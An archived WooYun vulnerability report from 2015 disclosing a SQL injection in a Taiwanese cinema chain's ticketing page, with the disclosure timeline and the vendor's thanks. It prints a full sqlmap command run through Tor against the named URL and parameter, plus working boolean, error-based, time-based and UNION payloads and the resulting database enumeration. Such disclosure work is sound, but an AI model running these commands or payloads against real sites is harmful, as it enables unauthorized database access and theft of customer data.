乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-02: 细节已通知厂商并且等待厂商处理中 2015-06-06: 厂商已经确认,细节仅向厂商公开 2015-06-16: 细节向核心白帽子及相关领域专家公开 2015-06-26: 细节向普通白帽子公开 2015-07-06: 细节向实习白帽子公开 2015-07-21: 细节向公众公开
台湾某影城分站SQL注入
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --threads 2 --technique=BEUT -u "https://tienmou.woviecinemas.com.tw/ticket_wovie.php?pid_for_movie=430" --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: pid_for_movie (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid_for_movie=430 AND 5050=5050 Type: error-based Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: pid_for_movie=430 AND ROW(2680,4822)>(SELECT COUNT(*),CONCAT(0x7170626271,(SELECT (ELT(2680=2680,1))),0x71707a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 6046 UNION SELECT 5052 UNION SELECT 7419 UNION SELECT 7588)a GROUP BY x) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: pid_for_movie=430 AND 7536=BENCHMARK(20000000,MD5(0x776e6f41)) Type: UNION query Title: MySQL UNION query (NULL) - 75 columns Payload: pid_for_movie=430 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x45716a53725161544c78,0x71707a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---
[23:42:05] [INFO] the back-end DBMS is MySQLweb application technology: PHP 4.3.9, Apache 2.0.65back-end DBMS: MySQL 4.1available databases [1]:[*] wovie_tienmou
WAF
危害等级:高
漏洞Rank:15
确认时间:2015-06-06 03:20
感謝通報
暂无